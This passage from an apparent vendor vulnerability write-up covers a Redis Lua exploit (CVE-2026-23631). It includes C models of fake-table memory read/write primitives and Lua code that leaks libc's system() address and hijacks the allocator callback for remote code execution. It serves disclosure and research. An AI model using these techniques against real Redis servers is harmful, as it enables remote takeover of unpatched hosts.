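static void copy1(FakeTable *dst, const FakeTable *src) {
    memcpy(dst->array, src->array, sizeof(TV));
}

/* local x = t[1]: usable as a number only if the tag is LUA_TNUMBER. */
static int get1_num(const FakeTable *t, double *out) {
    TV v;
    memcpy(&v, t->array, sizeof v);
    if (v.tt != LUA_TNUMBER) return 0;
    *out = v.value.n;
    return 1;
}

typedef struct {
    FakeTable t1, t2, t3, t4;
    TV t3_array[2]; /* element [1] absorbs the spill from writing through t4 */
} toy_prims;

static void prims_init(toy_prims *p) {
    memset(p, 0, sizeof *p);
    p->t1.sizearray = 1;
    p->t2.array = (TV *)(void *)&p->t1.array;       /* t2[1] overlays t1->array */
    p->t2.sizearray = 1;
    p->t3.array = p->t3_array;
    p->t3.sizearray = 1;
    p->t4.array = (TV *)(void *)&p->t3_array[0].tt; /* t4[1] overlays t3[1]'s tag */
    p->t4.sizearray = 1;
}

/* write(addr, val): also clobbers the 8 bytes at addr+8 with the tag. */
static void prims_write(toy_prims *p, uint64_t addr, uint64_t val) {
    set1_num(&p->t2, u2d(addr)); /* fake_table2[1] = addr -> t1->array = addr */
    set1_num(&p->t1, u2d(val));  /* fake_table1[1] = val  -> *addr = val */
}

/* read(addr): returns 1 and stores the 8 bytes at addr in *out. */
static int prims_read(toy_prims *p, uint64_t addr, uint64_t *out) {
    double d;
    set1_num(&p->t2, u2d(addr));        /* t1->array = addr */
    copy1(&p->t3, &p->t1);              /* t3[1] = t1[1], junk tag included */
    set1_num(&p->t4, u2d(LUA_TNUMBER)); /* raw bits 3 land on t3[1]'s tag */
    if (!get1_num(&p->t3, &d)) return 0;
    *out = d2u(d);
    return 1;
}
```

The write also clobbers the 8 bytes at addr+8, and the tag fix spills into t3_array[1], which is why the model reserves a second element there.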
Achieving Code Execution
Now that we have a Lua function running in a stable VM with memory read/write capabilities and the addresses of Lua heap objects, the path to code execution is fairly straightforward.
There are many possible paths from here. My two favorites are:
- Override lua_State->errorJmp, which points to the jmp_buf that Lua jumps to when a Lua error is thrown, in order to revert the stack back to the most recent protected call. We can override it and then throw an error, which gives us control of rip and rsp (and some more registers) that we can trivially use to run a ROP chain.
- Override lua_State->l_G->frealloc, which is a typedef void * (*lua_Alloc) (void *ud, void *ptr, size_t osize, size_t nsize). This is Lua's malloc()/free() callback, which will be called the next time Lua allocates, frees, or reallocates an object. Furthermore, its first argument is lua_State->l_G->ud, which is great for us: we get a function call primitive with a controlled first argument.
For the current exploit, I decided to go with the function call path in order to reduce the exploit complexity and minimize the chance of crashing during the competition.
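Here is a hedged C model of why overwriting frealloc and ud yields a call primitive. The VM funnels every allocation through g->frealloc(g->ud, ...), as luaM_realloc_ does in Lua 5.1. toy_global_State, toy_vm_alloc, and fake_system are hypothetical names, and fake_system is a harmless, correctly typed stand-in for system(). In the real exploit, system() ignores the extra arguments on x86-64 because its only parameter arrives in the first argument register. Calling it through a mismatched pointer type is not valid portable C, though, so the sketch avoids that.

```c
#include <stddef.h>
#include <string.h>

/* Same signature as Lua 5.1's allocator callback type. */
typedef void *(*lua_Alloc)(void *ud, void *ptr, size_t osize, size_t nsize);

/* Only the two global_State fields this sketch needs (the real struct has many more). */
typedef struct { lua_Alloc frealloc; void *ud; } toy_global_State;

/* What the VM effectively does whenever it needs memory. */
static void *toy_vm_alloc(toy_global_State *g, size_t n) {
    return g->frealloc(g->ud, NULL, 0, n);
}

/* Harmless stand-in for system(): records the "command" it was handed as ud. */
static char last_command[128];
static void *fake_system(void *ud, void *ptr, size_t osize, size_t nsize) {
    (void)ptr; (void)osize; (void)nsize;
    strncpy(last_command, (const char *)ud, sizeof last_command - 1);
    return NULL;
}
```

With frealloc set to fake_system and ud pointing at a command string, the very next allocation hands that string to the "system" stand-in.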
We still do not have any libc pointers, so we cannot calculate libc's ASLR offset, and the redis-server binary does not contain a PLT stub for system(). Instead, we can:
- Leak the redis-server base address by reading the C function pointer of a built-in Lua function (os.clock in the code below).
- Read the address stored in umask@got.plt (which redis-server does have) to get libc's umask address.
- Subtract umask's relative address to get libc's ASLR offset.
- Add system's relative address to get system's address.
- Create a new coroutine (which will run in a separate lua_State).
- Leak its address.
- Assign its lua_State->l_G->frealloc to system (in the code below, by pointing l_G at a fake global_State).
- Assign its lua_State->l_G->ud to a pointer to our payload command string.
- Resume the coroutine.
- The next time it attempts to allocate memory, it will call system() with our command. :)
local os_clock = read(toaddr(os.clock) + offsetof(CClosure, f), true) -- Read address of a C function in the redis-server binary
local redis_server_base = os_clock - offsets["redis-server"]["os_clock"]
local umask_got = redis_server_base + offsets["redis-server"]["umask@got.plt"]
local umask = read(umask_got, true)
local libc_base = umask - offsets["libc"]["umask"]
local system = libc_base + offsets["libc"]["system"]
local fake_l_G = malloc_184()
write(fake_l_G + offsetof(global_State, frealloc), system)
write(fake_l_G + offsetof(global_State, ud), command_payload_addr)
-- ...some more writes...
local co = coroutine.create(function() end)
local co_addr = toaddr(co)
write(co_addr + offsetof(lua_State, l_G), fake_l_G)
-- ...some more writes...
coroutine.resume(co) -- Executes system()!
Conclusions
In this writeup, we walked through Redis's Lua engines and replication subsystem, some of the Lua 5.1 engine's internals, the root cause of the DarkReplica vulnerability, and the full exploitation path to achieve Remote Code Execution.
The vulnerability abuses a logic flaw in Redis's replication process, and demonstrates the complexity of achieving "concurrency" in complicated software with a lot of moving parts. The exploit itself also includes some powerful generic Lua VM exploitation primitives and techniques.
DarkReplica was submitted to the ZeroDay.Cloud 2025 competition in London, where it was awarded $30,000.
Redis patched this vulnerability in versions 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3. Patch your instance ASAP.
The full exploit code can be found here.
How Wiz Can Help
Wiz customers can use the pre-built query and advisory in the Wiz Threat Center to assess the risk in their environment.
Wiz identifies both internal and publicly exposed Redis instances in your environment affected by CVE-2026-23631, and alerts you to instances that have been misconfigured to allow unauthenticated access or use weak or default passwords.
Timeline
- Dec 10-11, 2025: Vulnerability discovered and demonstrated at ZeroDay.Cloud 2025 by Yoni Sherez.
- May 5, 2026: Fix shipped in Redis 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3.
- May 5, 2026: CVE-2026-23631 published.